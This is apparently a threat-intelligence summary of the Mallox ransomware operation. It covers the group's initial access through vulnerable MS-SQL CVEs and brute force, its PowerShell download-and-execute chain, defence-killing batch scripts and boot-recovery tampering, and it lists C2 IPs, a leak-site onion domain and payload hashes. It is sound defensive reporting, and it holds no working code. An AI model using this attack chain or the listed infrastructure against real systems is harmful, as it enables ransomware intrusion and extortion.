Mallox is a long-running ransomware threat operating under a RaaS model that continues to target enterprises via exposed MS-SQL and related services, using brute force and CVE-driven exploits to gain initial access. The Gang’s recent activity features Mallox.Resurrection payloads, ransom notes, and data-leak disclosures, with defenses urged to harden public-facing services. #Mallox #MalloxResurrection
Keypoints
- Mallox operates as a Ransomware-as-a-Service (RaaS) and recruits via underground markets, maintaining a TOR leaks site and a presence on X/Twitter for updates.
- Initial access focuses on publicly exposed MS-SQL/ODBC interfaces, targeting CVE-2019-1068 and CVE-2020-0618, along with brute-force attempts on weak services.
- Phishing is used to deliver frameworks like Cobalt Strike and Sliver to compromise victims.
- Post-compromise, Mallox uses PowerShell to run scripts and download ransomware, including Kill-Delete.bat and Bwmeldokiller.bat to terminate interfering processes.
- Payloads labeled Mallox.Resurrection encrypt files with a .mallox extension and place ransom notes (HOW TO BACK FILES.TXT) and TargetID files on victims’ desktops.
- Boot/Recovery disruption is used via Boot Configuration Data changes to hinder recovery, alongside data-leak site disclosures to pressure victims.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Mallox gains initial access by exploiting vulnerable/publicly exposed MS-SQL/ODBC interfaces, targeting CVE-2019-1068 and CVE-2020-0618. ‘Mallox primarily gains initial access through the exploitation of vulnerable and publicly exposed services, with a particular focus on MS-SQL (Microsoft SQL Server) and ODBC interfaces. Specific vulnerabilities are targeted, including unpatched instances of old remote code execution (RCE) vulnerabilities like CVE-2019-1068 in Microsoft SQL Server and CVE-2020-0618 in Microsoft SQL Server Reporting Services.’
- [T1110] Brute Force – ‘brute force attacks against weakly configured services and applications open to the public internet. In recent campaigns Mallox actors gained initial access through dictionary-based brute-force attacks against weak MS-SQL interfaces.’
- [T1566] Phishing – ‘phishing emails to deliver attack frameworks such as Cobalt Strike and Sliver.’
- [T1059.001] PowerShell – ‘After gaining initial access, Mallox threat actors typically execute PowerShell commands to run various batch scripts and download the ransomware payload.’
- [T1105] Ingress Tool Transfer – ‘The command sequence first crafts a PowerShell script in the system’s temporary directory, leveraging the WebClient class to download an executable from a remote server.’
- [T1047] Windows Management Instrumentation – ‘The script then employs Windows Management Instrumentation (WMIC) to execute the ransomware payload.’
- [T1562.001] Impair Defenses – ‘Kill-Delete.bat script is used to terminate or remove running processes that may interfere with or prevent the ransomware’s encryption routine.’
- [T1486] Data Encrypted for Impact – ‘Encrypted files are appended with the .mallox extension.’
- [T1542] Pre-OS Boot / Modify Boot or Recovery – ‘These serve to alter the Boot Configuration Data (BCD) settings, affecting the OS’s ability to recover from failure and preventing administrators from restoring the system with Windows built-in tools.’
Indicators of Compromise
- [IP Address] 104.21.76.77, 104.237.62.211 – Distro/C2 IP addresses used for command and control and payload delivery.
- [IP Address] 172.67.191.103, 64.185.227.155 – Additional Distro/C2 IP addresses observed in campaigns.
- [Domain] wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion – Mallox DLS data-leak site domain.
- [File Hash] 08a236455490d5246a880821ba33108c4ef00047, 0d2711c5f8eb84bd9915a4191999afd46abca67a – Mallox payload hashes.
- [File Hash] 0e45e8a5b25c756f743445f0317c6352d3c8040a, 11d7779e77531eb27831e65c32798405746ccea1 – Additional Mallox payload hashes.
- [File Name] updt.ps1, Bwmeldokiller.bat – IOCs associated with the initial access and defense-evasion stages.
- [File Name] Kill-Delete.bat – IOC used to terminate processes that could interfere with encryption.
- [File Name] Targetinfo.txt – Ransomware victim information file containing the TargetID and host details.